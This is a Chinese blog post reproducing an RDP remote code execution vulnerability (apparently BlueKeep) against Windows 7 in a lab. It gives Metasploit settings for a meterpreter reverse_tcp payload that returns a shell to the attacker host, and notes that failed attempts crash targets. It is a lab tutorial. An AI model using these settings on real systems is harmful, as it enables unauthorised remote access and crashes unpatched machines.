漏洞影响Windows版本：

Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows 8和Windows 10及之后版本的用户不受此漏洞影响。
复现环境：

Kali：192.168.10.11
Win7(X64，SP1)：192.168.10.16
Windows Server 2008 SP2 DataCenter(X64)：192.168.10.15 （不在漏洞范围内）

查看targets

设置参数

 set payload windows/x64/meterpreter/reverse_tcp   #设置payload

 set rhosts 192.168.10.16             #目标机ip

 set lhost 192.168.10.11              #攻击机ip

 set rdp_client_ip 192.168.10.16      #目标机ip

 unset RDP_CLIENT_NAME                #取消设置这个参数

 set target     #这里我是vmware的虚拟机，按理来说target应该是设置为3，但是设置为3没打成功，设置为2打成功了

攻击成功，成功拿到目标机反弹回来的shell。

按照这个步骤，攻击Windows Server 2008R2蓝屏。看网上说貌似是要改注册表，需要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam 值修改为0。但是我的这个DataCenter的Server2008R2 没有这个注册表。而且好像貌似 DataCenter的Server 2008R2 并不在漏洞影响系统之内。所以打成蓝屏了。

看了网上很多人的文章，也都是说打的蓝屏。总的来说，这个漏洞的质量并没有MS17_010永恒之蓝的高，没打成就变成蓝屏了。而且利用起来貌似限制蛮多的。单核服务器上成功率约90%, 双核上 40-60%, 四核上10%，如果失败，目标系统会蓝屏。
————————————————
版权声明：本文为CSDN博主「谢公子」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_36119192/article/details/100609875

最新文章

1. Mallet 使用说明
2. 关于springmvc的配置文件
3. java session 详解
4. 伪类link,hover,active,visited,focus的区别
5. phpcms安装
6. JavaScript吸顶灯的实现
7. shell调用sqlplus批量执行sql文件
8. 几种流行Webservice框架性能对比
9. Objective C多态
10. osprofiler在openstack Cinder里的使用
11. C# NuGet包管理命令
12. 『cURL』curl: (6) Could not resolve host无法解析主机地址
13. python基础---面向对象的概念
14. Elasticsearch实践（一）：基础入门
15. cisco和华为的设备如何设置命令不分页显示
16. C#与Java AES 加密解密
17. GUI练习3
18. Android 4.4 根据uri获取路径的方法
19. 日常英语---十一、MapleStory/Monsters/Level 201-210（Dark Demon Eagle Rider）
20. 第7章 使用寄存器点亮LED灯

热门文章

1. 项目中关于RPC 和rocketMQ使用场景的感受
2. RedBlack-Tree（红黑树）原理及C++代码实现
3. BeagleboneBlack上u-boot的MLO文件是哪里来的
4. Qt LNK1112: 模块计算机类型“x64”与目标计算机类型“X86”冲突问题
5. 使用idea创建spring mvc项目图文教程
6. JQuery实现复制数据到剪贴板之各种麻花与右键点击弹出选择菜单
7. WebService客户端生成方法
8. golang kafka clinet 内存泄露问题处理
9. Python之循环条件、变量、字符串格式化
10. IoC容器设计